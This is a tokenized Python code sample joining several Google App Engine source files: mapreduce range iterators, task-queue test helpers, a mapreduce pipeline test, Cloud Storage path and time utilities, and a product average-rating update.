( cls , <EOL> k_ranges , <EOL> query_spec , <EOL> key_range_iter_cls ) : <EOL> """<STR_LIT>""" <EOL> return _KeyRangesIterator ( k_ranges , query_spec , key_range_iter_cls ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> return _RANGE_ITERATORS [ json [ "<STR_LIT:name>" ] ] . from_json ( json ) <EOL> class RangeIterator ( json_util . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def __repr__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class _PropertyRangeModelIterator ( RangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , p_range , ns_range , query_spec ) : <EOL> """<STR_LIT>""" <EOL> self . _property_range = p_range <EOL> self . _ns_range = ns_range <EOL> self . _query_spec = query_spec <EOL> self . _cursor = None <EOL> self . _query = None <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % str ( self . _property_range ) <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> for ns in self . _ns_range : <EOL> self . _query = self . _property_range . make_query ( ns ) <EOL> if isinstance ( self . _query , db . Query ) : <EOL> if self . _cursor : <EOL> self . _query . with_cursor ( self . _cursor ) <EOL> for model_instance in self . _query . run ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only ) : <EOL> yield model_instance <EOL> else : <EOL> self . _query = self . _query . iter ( batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only , <EOL> start_cursor = self . _cursor , <EOL> produce_cursors = True ) <EOL> for model_instance in self . _query : <EOL> yield model_instance <EOL> self . _query = None <EOL> self . _cursor = None <EOL> if ns != self . _ns_range . namespace_end : <EOL> self . _ns_range = self . _ns_range . with_start_after ( ns ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> cursor = self . _cursor <EOL> if self . _query is not None : <EOL> if isinstance ( self . _query , db . Query ) : <EOL> cursor = self . _query . cursor ( ) <EOL> else : <EOL> cursor = self . _query . cursor_after ( ) <EOL> if cursor is None or isinstance ( cursor , basestring ) : <EOL> cursor_object = False <EOL> else : <EOL> cursor_object = True <EOL> cursor = cursor . to_websafe_string ( ) <EOL> return { "<STR_LIT>" : self . _property_range . to_json ( ) , <EOL> "<STR_LIT>" : self . _query_spec . to_json ( ) , <EOL> "<STR_LIT>" : cursor , <EOL> "<STR_LIT>" : self . _ns_range . to_json_object ( ) , <EOL> "<STR_LIT:name>" : self . __class__ . __name__ , <EOL> "<STR_LIT>" : cursor_object } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> obj = cls ( property_range . PropertyRange . from_json ( json [ "<STR_LIT>" ] ) , <EOL> namespace_range . NamespaceRange . from_json_object ( json [ "<STR_LIT>" ] ) , <EOL> model . QuerySpec . from_json ( json [ "<STR_LIT>" ] ) ) <EOL> cursor = json [ "<STR_LIT>" ] <EOL> if cursor and json [ "<STR_LIT>" ] : <EOL> obj . _cursor = datastore_query . Cursor . from_websafe_string ( cursor ) <EOL> else : <EOL> obj . _cursor = cursor <EOL> return obj <EOL> class _MultiPropertyRangeModelIterator ( RangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , p_range_iters ) : <EOL> """<STR_LIT>""" <EOL> self . _iters = p_range_iters <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % str ( <EOL> [ str ( it ) for it in self . _iters ] ) <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> for model_instance in itertools . chain . from_iterable ( self . _iters ) : <EOL> yield model_instance <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> json = { "<STR_LIT:name>" : self . __class__ . __name__ , <EOL> "<STR_LIT>" : len ( self . _iters ) } <EOL> for i in xrange ( len ( self . _iters ) ) : <EOL> json_item = self . _iters [ i ] . to_json ( ) <EOL> query_spec = json_item [ "<STR_LIT>" ] <EOL> item_name = json_item [ "<STR_LIT:name>" ] <EOL> del json_item [ "<STR_LIT>" ] <EOL> del json_item [ "<STR_LIT:name>" ] <EOL> json [ str ( i ) ] = json_item <EOL> json [ "<STR_LIT>" ] = query_spec <EOL> json [ "<STR_LIT>" ] = item_name <EOL> return json <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> num_ranges = int ( json [ "<STR_LIT>" ] ) <EOL> query_spec = json [ "<STR_LIT>" ] <EOL> item_name = json [ "<STR_LIT>" ] <EOL> p_range_iters = [ ] <EOL> for i in xrange ( num_ranges ) : <EOL> json_item = json [ str ( i ) ] <EOL> json_item [ "<STR_LIT>" ] = query_spec <EOL> json_item [ "<STR_LIT:name>" ] = item_name <EOL> p_range_iters . append ( _PropertyRangeModelIterator . from_json ( json_item ) ) <EOL> obj = cls ( p_range_iters ) <EOL> return obj <EOL> class _KeyRangesIterator ( RangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> k_ranges , <EOL> query_spec , <EOL> key_range_iter_cls ) : <EOL> """<STR_LIT>""" <EOL> self . _key_ranges = k_ranges <EOL> self . _query_spec = query_spec <EOL> self . _key_range_iter_cls = key_range_iter_cls <EOL> self . _current_iter = None <EOL> self . _current_key_range = None <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % str ( self . _key_ranges ) <EOL> def __iter__ ( self ) : <EOL> while True : <EOL> if self . _current_iter : <EOL> for o in self . _current_iter : <EOL> yield o <EOL> try : <EOL> k_range = self . _key_ranges . next ( ) <EOL> self . _current_iter = self . _key_range_iter_cls ( k_range , <EOL> self . _query_spec ) <EOL> except StopIteration : <EOL> self . _current_iter = None <EOL> break <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> current_iter = None <EOL> if self . _current_iter : <EOL> current_iter = self . _current_iter . to_json ( ) <EOL> return { "<STR_LIT>" : self . _key_ranges . to_json ( ) , <EOL> "<STR_LIT>" : self . _query_spec . to_json ( ) , <EOL> "<STR_LIT>" : current_iter , <EOL> "<STR_LIT>" : self . _key_range_iter_cls . __name__ , <EOL> "<STR_LIT:name>" : self . __class__ . __name__ } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> key_range_iter_cls = _KEY_RANGE_ITERATORS [ json [ "<STR_LIT>" ] ] <EOL> obj = cls ( key_ranges . KeyRangesFactory . from_json ( json [ "<STR_LIT>" ] ) , <EOL> model . QuerySpec . from_json ( json [ "<STR_LIT>" ] ) , <EOL> key_range_iter_cls ) <EOL> current_iter = None <EOL> if json [ "<STR_LIT>" ] : <EOL> current_iter = key_range_iter_cls . from_json ( json [ "<STR_LIT>" ] ) <EOL> obj . _current_iter = current_iter <EOL> return obj <EOL> _RANGE_ITERATORS = { <EOL> _PropertyRangeModelIterator . __name__ : _PropertyRangeModelIterator , <EOL> _MultiPropertyRangeModelIterator . __name__ : _MultiPropertyRangeModelIterator , <EOL> _KeyRangesIterator . __name__ : _KeyRangesIterator <EOL> } <EOL> class AbstractKeyRangeIterator ( json_util . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , k_range , query_spec ) : <EOL> """<STR_LIT>""" <EOL> self . _key_range = k_range <EOL> self . _query_spec = query_spec <EOL> self . _cursor = None <EOL> self . _query = None <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _get_cursor ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> cursor = self . _get_cursor ( ) <EOL> cursor_object = False <EOL> if cursor and isinstance ( cursor , datastore_query . Cursor ) : <EOL> cursor = cursor . to_websafe_string ( ) <EOL> cursor_object = True <EOL> return { "<STR_LIT>" : self . _key_range . to_json ( ) , <EOL> "<STR_LIT>" : self . _query_spec . to_json ( ) , <EOL> "<STR_LIT>" : cursor , <EOL> "<STR_LIT>" : cursor_object } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> obj = cls ( key_range . KeyRange . from_json ( json [ "<STR_LIT>" ] ) , <EOL> model . QuerySpec . from_json ( json [ "<STR_LIT>" ] ) ) <EOL> cursor = json [ "<STR_LIT>" ] <EOL> if cursor and json [ "<STR_LIT>" ] : <EOL> obj . _cursor = datastore_query . Cursor . from_websafe_string ( cursor ) <EOL> else : <EOL> obj . _cursor = cursor <EOL> return obj <EOL> class KeyRangeModelIterator ( AbstractKeyRangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> self . _query = self . _key_range . make_ascending_query ( <EOL> util . for_name ( self . _query_spec . model_class_path ) , <EOL> filters = self . _query_spec . filters ) <EOL> if isinstance ( self . _query , db . Query ) : <EOL> if self . _cursor : <EOL> self . _query . with_cursor ( self . _cursor ) <EOL> for model_instance in self . _query . run ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only ) : <EOL> yield model_instance <EOL> else : <EOL> self . _query = self . _query . iter ( batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only , <EOL> start_cursor = self . _cursor , <EOL> produce_cursors = True ) <EOL> for model_instance in self . _query : <EOL> yield model_instance <EOL> def _get_cursor ( self ) : <EOL> if self . _query is None : <EOL> return self . _cursor <EOL> if isinstance ( self . _query , db . Query ) : <EOL> return self . _query . cursor ( ) <EOL> else : <EOL> return self . _query . cursor_after ( ) <EOL> class KeyRangeEntityIterator ( AbstractKeyRangeIterator ) : <EOL> """<STR_LIT>""" <EOL> _KEYS_ONLY = False <EOL> def __iter__ ( self ) : <EOL> self . _query = self . _key_range . make_ascending_datastore_query ( <EOL> self . _query_spec . entity_kind , filters = self . _query_spec . filters ) <EOL> for entity in self . _query . Run ( config = datastore_query . QueryOptions ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only or self . _KEYS_ONLY , <EOL> start_cursor = self . _cursor ) ) : <EOL> yield entity <EOL> def _get_cursor ( self ) : <EOL> if self . _query is None : <EOL> return self . _cursor <EOL> return self . _query . GetCursor ( ) <EOL> class KeyRangeKeyIterator ( KeyRangeEntityIterator ) : <EOL> """<STR_LIT>""" <EOL> _KEYS_ONLY = True <EOL> class KeyRangeEntityProtoIterator ( AbstractKeyRangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> query = self . _key_range . make_ascending_datastore_query ( <EOL> self . _query_spec . entity_kind , filters = self . _query_spec . filters ) <EOL> connection = datastore_rpc . Connection ( ) <EOL> query_options = datastore_query . QueryOptions ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> start_cursor = self . _cursor , <EOL> produce_cursors = True ) <EOL> self . _query = datastore_query . ResultsIterator ( <EOL> query . GetQuery ( ) . run ( connection , query_options ) ) <EOL> for entity_proto in self . _query : <EOL> yield entity_proto <EOL> def _get_cursor ( self ) : <EOL> if self . _query is None : <EOL> return self . _cursor <EOL> return self . _query . cursor ( ) <EOL> _KEY_RANGE_ITERATORS = { <EOL> KeyRangeModelIterator . __name__ : KeyRangeModelIterator , <EOL> KeyRangeEntityIterator . __name__ : KeyRangeEntityIterator , <EOL> KeyRangeKeyIterator . __name__ : KeyRangeKeyIterator , <EOL> KeyRangeEntityProtoIterator . __name__ : KeyRangeEntityProtoIterator <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import collections <EOL> import logging <EOL> import os <EOL> import re <EOL> from mapreduce import main <EOL> from mapreduce import model <EOL> from google . appengine . ext . webapp import mock_webapp <EOL> _LOGGING_LEVEL = logging . ERROR <EOL> logging . getLogger ( ) . setLevel ( _LOGGING_LEVEL ) <EOL> def decode_task_payload ( task ) : <EOL> """<STR_LIT>""" <EOL> if not task : <EOL> return { } <EOL> body = base64 . b64decode ( task [ "<STR_LIT:body>" ] ) <EOL> return model . HugeTask . _decode_payload ( body ) <EOL> def execute_task ( task , retries = <NUM_LIT:0> , handlers_map = None ) : <EOL> """<STR_LIT>""" <EOL> if not handlers_map : <EOL> handlers_map = main . create_handlers_map ( ) <EOL> url = task [ "<STR_LIT:url>" ] <EOL> handler = None <EOL> params = [ ] <EOL> for ( re_str , handler_class ) in handlers_map : <EOL> re_str = "<STR_LIT>" + re_str + "<STR_LIT>" <EOL> m = re . match ( re_str , url ) <EOL> if m : <EOL> params = m . groups ( ) [ : - <NUM_LIT:1> ] <EOL> break <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % task ) <EOL> request = mock_webapp . MockRequest ( ) <EOL> request . set_url ( url ) <EOL> version = "<STR_LIT>" <EOL> module = "<STR_LIT>" <EOL> default_version_hostname = "<STR_LIT>" <EOL> host = "<STR_LIT>" % ( version . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] , <EOL> module , <EOL> default_version_hostname ) <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = version <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = ( <EOL> default_version_hostname ) <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = module <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = host <EOL> for k , v in task . get ( "<STR_LIT>" , [ ] ) : <EOL> request . headers [ k ] = v <EOL> environ_key = "<STR_LIT>" + k . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) . upper ( ) <EOL> request . environ [ environ_key ] = v <EOL> request . headers [ "<STR_LIT>" ] = retries <EOL> request . environ [ "<STR_LIT>" ] = ( <EOL> task . get ( "<STR_LIT:name>" , "<STR_LIT>" ) ) <EOL> request . environ [ "<STR_LIT>" ] = ( <EOL> task . get ( "<STR_LIT>" , "<STR_LIT:default>" ) ) <EOL> request . environ [ "<STR_LIT>" ] = request . path <EOL> if task [ "<STR_LIT>" ] == "<STR_LIT:POST>" : <EOL> request . body = base64 . b64decode ( task [ "<STR_LIT:body>" ] ) <EOL> for k , v in decode_task_payload ( task ) . iteritems ( ) : <EOL> request . set ( k , v ) <EOL> response = mock_webapp . MockResponse ( ) <EOL> saved_os_environ = os . environ <EOL> copy_os_environ = dict ( os . environ ) <EOL> copy_os_environ . update ( request . environ ) <EOL> try : <EOL> os . environ = copy_os_environ <EOL> handler = handler_class ( request , response ) <EOL> except TypeError : <EOL> handler = handler_class ( ) <EOL> handler . initialize ( request , response ) <EOL> finally : <EOL> os . environ = saved_os_environ <EOL> try : <EOL> os . environ = copy_os_environ <EOL> if task [ "<STR_LIT>" ] == "<STR_LIT:POST>" : <EOL> handler . post ( * params ) <EOL> elif task [ "<STR_LIT>" ] == "<STR_LIT:GET>" : <EOL> handler . get ( * params ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % task . method ) <EOL> finally : <EOL> os . environ = saved_os_environ <EOL> if handler . response . status != <NUM_LIT:200> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( handler . response . status , <EOL> handler . response . status_message , <EOL> task , <EOL> handler ) ) <EOL> return handler <EOL> def execute_all_tasks ( taskqueue , queue = "<STR_LIT:default>" , handlers_map = None ) : <EOL> """<STR_LIT>""" <EOL> tasks = taskqueue . GetTasks ( queue ) <EOL> taskqueue . FlushQueue ( queue ) <EOL> task_run_counts = collections . defaultdict ( lambda : <NUM_LIT:0> ) <EOL> for task in tasks : <EOL> retries = <NUM_LIT:0> <EOL> while True : <EOL> try : <EOL> handler = execute_task ( task , retries , handlers_map = handlers_map ) <EOL> task_run_counts [ handler . __class__ ] += <NUM_LIT:1> <EOL> break <EOL> except Exception , e : <EOL> retries += <NUM_LIT:1> <EOL> if retries > <NUM_LIT:100> : <EOL> logging . debug ( "<STR_LIT>" , <EOL> task [ "<STR_LIT:name>" ] ) <EOL> raise <EOL> logging . debug ( <EOL> "<STR_LIT>" , <EOL> task [ "<STR_LIT:name>" ] , <EOL> retries ) <EOL> logging . debug ( e ) <EOL> return task_run_counts <EOL> def execute_until_empty ( taskqueue , queue = "<STR_LIT:default>" , handlers_map = None ) : <EOL> """<STR_LIT>""" <EOL> task_run_counts = collections . defaultdict ( lambda : <NUM_LIT:0> ) <EOL> while taskqueue . GetTasks ( queue ) : <EOL> new_counts = execute_all_tasks ( taskqueue , queue , handlers_map ) <EOL> for handler_cls in new_counts : <EOL> task_run_counts [ handler_cls ] += new_counts [ handler_cls ] <EOL> return task_run_counts </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import pipeline <EOL> import cloudstorage <EOL> from google . appengine . ext import db <EOL> from mapreduce import input_readers <EOL> from mapreduce import mapreduce_pipeline <EOL> from mapreduce import output_writers <EOL> from mapreduce import records <EOL> from mapreduce import test_support <EOL> from testlib import testutil <EOL> class TestEntity ( db . Model ) : <EOL> """<STR_LIT>""" <EOL> data = db . TextProperty ( ) <EOL> def map_yield_lots_of_values ( entity ) : <EOL> """<STR_LIT>""" <EOL> for _ in range ( <NUM_LIT> ) : <EOL> yield ( <NUM_LIT:1> , "<STR_LIT:U+0020>" * <NUM_LIT:100> ) <EOL> def reduce_length ( key , values ) : <EOL> """<STR_LIT>""" <EOL> yield str ( ( key , len ( values ) ) ) <EOL> class LargeMapreduceTest ( testutil . HandlerTestBase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> testutil . HandlerTestBase . setUp ( self ) <EOL> pipeline . Pipeline . _send_mail = self . _send_mail <EOL> self . emails = [ ] <EOL> def _send_mail ( self , sender , subject , body , html = None ) : <EOL> """<STR_LIT>""" <EOL> self . emails . append ( ( sender , subject , body , html ) ) <EOL> def testLotsOfValuesForSingleKey ( self ) : <EOL> TestEntity ( data = str ( <NUM_LIT:1> ) ) . put ( ) <EOL> p = mapreduce_pipeline . MapreducePipeline ( <EOL> "<STR_LIT:test>" , <EOL> __name__ + "<STR_LIT>" , <EOL> __name__ + "<STR_LIT>" , <EOL> input_reader_spec = input_readers . __name__ + "<STR_LIT>" , <EOL> output_writer_spec = ( <EOL> output_writers . __name__ + "<STR_LIT>" ) , <EOL> mapper_params = { <EOL> "<STR_LIT>" : __name__ + "<STR_LIT:.>" + TestEntity . __name__ , <EOL> } , <EOL> reducer_params = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> } , <EOL> shards = <NUM_LIT:16> ) <EOL> p . start ( ) <EOL> test_support . execute_until_empty ( self . taskqueue ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( self . emails ) ) <EOL> self . assertTrue ( self . emails [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . startswith ( <EOL> "<STR_LIT>" ) ) <EOL> p = mapreduce_pipeline . MapreducePipeline . from_id ( p . pipeline_id ) <EOL> output_data = [ ] <EOL> for output_file in p . outputs . default . value : <EOL> with cloudstorage . open ( output_file , "<STR_LIT:r>" ) as f : <EOL> for record in records . RecordsReader ( f ) : <EOL> output_data . append ( record ) <EOL> expected_data = [ "<STR_LIT>" ] <EOL> expected_data . sort ( ) <EOL> output_data . sort ( ) <EOL> self . assertEquals ( expected_data , output_data ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import calendar <EOL> import datetime <EOL> from email import utils as email_utils <EOL> import logging <EOL> import os <EOL> import re <EOL> try : <EOL> from google . appengine . api import runtime <EOL> except ImportError : <EOL> from google . appengine . api import runtime <EOL> _GCS_BUCKET_REGEX_BASE = r'<STR_LIT>' <EOL> _GCS_BUCKET_REGEX = re . compile ( _GCS_BUCKET_REGEX_BASE + r'<STR_LIT:$>' ) <EOL> _GCS_BUCKET_PATH_REGEX = re . compile ( r'<STR_LIT:/>' + _GCS_BUCKET_REGEX_BASE + r'<STR_LIT:$>' ) <EOL> _GCS_PATH_PREFIX_REGEX = re . compile ( r'<STR_LIT:/>' + _GCS_BUCKET_REGEX_BASE + r'<STR_LIT>' ) <EOL> _GCS_FULLPATH_REGEX = re . compile ( r'<STR_LIT:/>' + _GCS_BUCKET_REGEX_BASE + r'<STR_LIT>' ) <EOL> _GCS_METADATA = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> _GCS_OPTIONS = _GCS_METADATA + [ '<STR_LIT>' ] <EOL> CS_XML_NS = '<STR_LIT>' <EOL> LOCAL_GCS_ENDPOINT = '<STR_LIT>' <EOL> _access_token = '<STR_LIT>' <EOL> _MAX_GET_BUCKET_RESULT = <NUM_LIT:1000> <EOL> def set_access_token ( access_token ) : <EOL> """<STR_LIT>""" <EOL> global _access_token <EOL> _access_token = access_token <EOL> def get_access_token ( ) : <EOL> """<STR_LIT>""" <EOL> return _access_token <EOL> class GCSFileStat ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> filename , <EOL> st_size , <EOL> etag , <EOL> st_ctime , <EOL> content_type = None , <EOL> metadata = None , <EOL> is_dir = False ) : <EOL> """<STR_LIT>""" <EOL> self . filename = filename <EOL> self . is_dir = is_dir <EOL> self . st_size = None <EOL> self . st_ctime = None <EOL> self . etag = None <EOL> self . content_type = content_type <EOL> self . metadata = metadata <EOL> if not is_dir : <EOL> self . st_size = long ( st_size ) <EOL> self . st_ctime = float ( st_ctime ) <EOL> if etag [ <NUM_LIT:0> ] == '<STR_LIT:">' and etag [ - <NUM_LIT:1> ] == '<STR_LIT:">' : <EOL> etag = etag [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> self . etag = etag <EOL> def __repr__ ( self ) : <EOL> if self . is_dir : <EOL> return '<STR_LIT>' % self . filename <EOL> return ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> dict ( filename = self . filename , <EOL> st_size = self . st_size , <EOL> st_ctime = self . st_ctime , <EOL> etag = self . etag , <EOL> content_type = self . content_type , <EOL> metadata = self . metadata ) ) <EOL> def __cmp__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' , self . __class__ . __name__ , <EOL> other . __class__ . __name__ ) <EOL> if self . filename > other . filename : <EOL> return <NUM_LIT:1> <EOL> elif self . filename < other . filename : <EOL> return - <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def __hash__ ( self ) : <EOL> if self . etag : <EOL> return hash ( self . etag ) <EOL> return hash ( self . filename ) <EOL> CSFileStat = GCSFileStat <EOL> def get_metadata ( headers ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k , v ) for k , v in headers . iteritems ( ) <EOL> if any ( k . lower ( ) . startswith ( valid ) for valid in _GCS_METADATA ) ) <EOL> def validate_bucket_name ( name ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( name ) <EOL> if not _GCS_BUCKET_REGEX . match ( name ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % name ) <EOL> def validate_bucket_path ( path ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( path ) <EOL> if not _GCS_BUCKET_PATH_REGEX . match ( path ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % path ) <EOL> def validate_file_path ( path ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( path ) <EOL> if not _GCS_FULLPATH_REGEX . match ( path ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % path ) <EOL> def _process_path_prefix ( path_prefix ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( path_prefix ) <EOL> if not _GCS_PATH_PREFIX_REGEX . match ( path_prefix ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % path_prefix ) <EOL> bucket_name_end = path_prefix . find ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> bucket = path_prefix <EOL> prefix = None <EOL> if bucket_name_end != - <NUM_LIT:1> : <EOL> bucket = path_prefix [ : bucket_name_end ] <EOL> prefix = path_prefix [ bucket_name_end + <NUM_LIT:1> : ] or None <EOL> return bucket , prefix <EOL> def _validate_path ( path ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not isinstance ( path , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( path . __class__ , path ) ) <EOL> def validate_options ( options ) : <EOL> """<STR_LIT>""" <EOL> if not options : <EOL> return <EOL> for k , v in options . iteritems ( ) : <EOL> if not isinstance ( k , str ) : <EOL> raise TypeError ( '<STR_LIT>' % k ) <EOL> if not any ( k . lower ( ) . startswith ( valid ) for valid in _GCS_OPTIONS ) : <EOL> raise ValueError ( '<STR_LIT>' % k ) <EOL> if not isinstance ( v , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( v , k ) ) <EOL> def http_time_to_posix ( http_time ) : <EOL> """<STR_LIT>""" <EOL> if http_time is not None : <EOL> return email_utils . mktime_tz ( email_utils . parsedate_tz ( http_time ) ) <EOL> def posix_time_to_http ( posix_time ) : <EOL> """<STR_LIT>""" <EOL> if posix_time : <EOL> return email_utils . formatdate ( posix_time , usegmt = True ) <EOL> _DT_FORMAT = '<STR_LIT>' <EOL> def dt_str_to_posix ( dt_str ) : <EOL> """<STR_LIT>""" <EOL> parsable , _ = dt_str . split ( '<STR_LIT:.>' ) <EOL> dt = datetime . datetime . strptime ( parsable , _DT_FORMAT ) <EOL> return calendar . timegm ( dt . utctimetuple ( ) ) <EOL> def posix_to_dt_str ( posix ) : <EOL> """<STR_LIT>""" <EOL> dt = datetime . datetime . utcfromtimestamp ( posix ) <EOL> dt_str = dt . strftime ( _DT_FORMAT ) <EOL> return dt_str + '<STR_LIT>' <EOL> def local_run ( ) : <EOL> """<STR_LIT>""" <EOL> server_software = os . environ . get ( '<STR_LIT>' ) <EOL> if server_software is None : <EOL> return True <EOL> if '<STR_LIT>' in server_software : <EOL> return False <EOL> if server_software . startswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> return False <EOL> def local_api_url ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( os . environ . get ( '<STR_LIT>' ) , LOCAL_GCS_ENDPOINT ) <EOL> def memory_usage ( method ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( * args , ** kwargs ) : <EOL> logging . info ( '<STR_LIT>' , <EOL> method . __name__ , runtime . memory_usage ( ) . current ( ) ) <EOL> result = method ( * args , ** kwargs ) <EOL> logging . info ( '<STR_LIT>' , <EOL> method . __name__ , runtime . memory_usage ( ) . current ( ) ) <EOL> return result <EOL> return wrapper <EOL> def _add_ns ( tagname ) : <EOL> return '<STR_LIT>' % { '<STR_LIT>' : CS_XML_NS , <EOL> '<STR_LIT>' : tagname } <EOL> _T_CONTENTS = _add_ns ( '<STR_LIT>' ) <EOL> _T_LAST_MODIFIED = _add_ns ( '<STR_LIT>' ) <EOL> _T_ETAG = _add_ns ( '<STR_LIT>' ) <EOL> _T_KEY = _add_ns ( '<STR_LIT>' ) <EOL> _T_SIZE = _add_ns ( '<STR_LIT>' ) <EOL> _T_PREFIX = _add_ns ( '<STR_LIT>' ) <EOL> _T_COMMON_PREFIXES = _add_ns ( '<STR_LIT>' ) <EOL> _T_NEXT_MARKER = _add_ns ( '<STR_LIT>' ) <EOL> _T_IS_TRUNCATED = _add_ns ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import config <EOL> import docs <EOL> import models <EOL> from google . appengine . ext . deferred import defer <EOL> from google . appengine . ext import ndb <EOL> def intClamp ( v , low , high ) : <EOL> """<STR_LIT>""" <EOL> return max ( int ( low ) , min ( int ( v ) , int ( high ) ) ) <EOL> def updateAverageRating ( review_key ) : <EOL> """<STR_LIT>""" <EOL> def _tx ( ) : <EOL> review = review_key . get ( ) <EOL> product = review . product_key . get ( ) <EOL> if not review . rating_added : <EOL> review . rating_added = True <EOL> product . num_reviews += <NUM_LIT:1> <EOL> product . avg_rating = ( product . avg_rating + <EOL> ( review . rating - product . avg_rating ) / float ( product . num_reviews ) ) <EOL> product . needs_review_reindex = True <EOL> ndb . put_multi ( [ product , review ] ) <EOL> if not config . BATCH_RATINGS_UPDATE : <EOL> defer ( <EOL> models . Product . updateProdDocWithNewRating , <EOL> product . key . id ( ) , _transactional = True ) <EOL> return ( product , review ) <EOL> try : <EOL> ndb . transaction ( _tx , xg = True ) <EOL> except AttributeError : <EOL> logging . exception ( '<STR_LIT>' <EOL> + '<STR_LIT>' ) </s>
